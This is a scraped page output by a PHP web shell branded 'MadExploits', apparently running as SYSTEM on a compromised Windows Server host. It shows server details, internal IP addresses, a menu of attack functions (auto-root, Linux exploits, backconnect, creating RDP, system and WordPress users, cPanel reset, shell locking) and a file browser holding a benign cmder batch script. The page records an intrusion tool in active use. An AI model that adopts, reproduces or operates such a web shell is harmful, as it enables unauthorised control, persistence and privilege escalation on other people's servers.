Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
laragon /
bin /
cmder /
vendor /
lib /
[ HOME SHELL ]
Name
Size
Permission
Action
lib_base.cmd
2.71
KB
-rwxrwxrwx
lib_console.cmd
1.97
KB
-rwxrwxrwx
lib_git.cmd
8.5
KB
-rwxrwxrwx
lib_path.cmd
6.39
KB
-rwxrwxrwx
lib_profile.cmd
997
B
-rwxrwxrwx
start-ssh-agent.sh
580
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : lib_base.cmd
@echo off set lib_base=call "%~dp0lib_base.cmd" if "%~1" == "/h" ( %lib_base% help "%~0" ) else if "%1" neq "" ( call :%* ) exit /b :help :::=============================================================================== :::show_subs - shows all sub routines in a .bat/.cmd file with documentation :::. :::include: :::. ::: call "lib_base.cmd" :::. :::usage: :::. ::: %lib_base% show_subs "file" :::. :::options: :::. ::: file <in> full path to file containing lib_routines to display :::. :::------------------------------------------------------------------------------- for /f "tokens=* delims=:" %%a in ('type "%~1" ^| %WINDIR%\System32\findstr /i /r "^:::"') do ( rem echo a="%%a" if "%%a"=="." ( echo. ) else if /i "%%a" == "usage" ( echo %%a: ) else if /i "%%a" == "options" ( echo %%a: ) else if not "%%a" == "" ( echo %%a ) ) pause exit /b :cmder_shell :::=============================================================================== :::show_subs - shows all sub routines in a .bat/.cmd file with documentation :::. :::include: :::. ::: call "lib_base.cmd" :::. :::usage: :::. ::: %lib_base% cmder_shell :::. :::options: :::. ::: file <in> full path to file containing lib_routines to display :::. :::------------------------------------------------------------------------------- echo %comspec% | %WINDIR%\System32\find /i "\cmd.exe" > nul && set "CMDER_SHELL=cmd" echo %comspec% | %WINDIR%\System32\find /i "\tcc.exe" > nul && set "CMDER_SHELL=tcc" echo %comspec% | %WINDIR%\System32\find /i "\tccle" > nul && set "CMDER_SHELL=tccle" if not defined CMDER_CLINK ( set CMDER_CLINK=1 if "%CMDER_SHELL%" equ "tcc" set CMDER_CLINK=0 if "%CMDER_SHELL%" equ "tccle" set CMDER_CLINK=0 ) if not defined CMDER_ALIASES ( set CMDER_ALIASES=1 if "%CMDER_SHELL%" equ "tcc" set CMDER_ALIASES=0 if "%CMDER_SHELL%" equ "tccle" set CMDER_ALIASES=0 ) exit /b :update_legacy_aliases type "%user_aliases%" | %WINDIR%\System32\findstr /i ";= Add aliases below here" >nul if "%errorlevel%" == "1" ( echo Creating initial user_aliases store in "%user_aliases%"... if defined CMDER_USER_CONFIG ( copy "%user_aliases%" "%user_aliases%.old_format" copy "%CMDER_ROOT%\vendor\user_aliases.cmd.default" "%user_aliases%" ) else ( copy "%user_aliases%" "%user_aliases%.old_format" copy "%CMDER_ROOT%\vendor\user_aliases.cmd.default" "%user_aliases%" ) ) exit /b
Close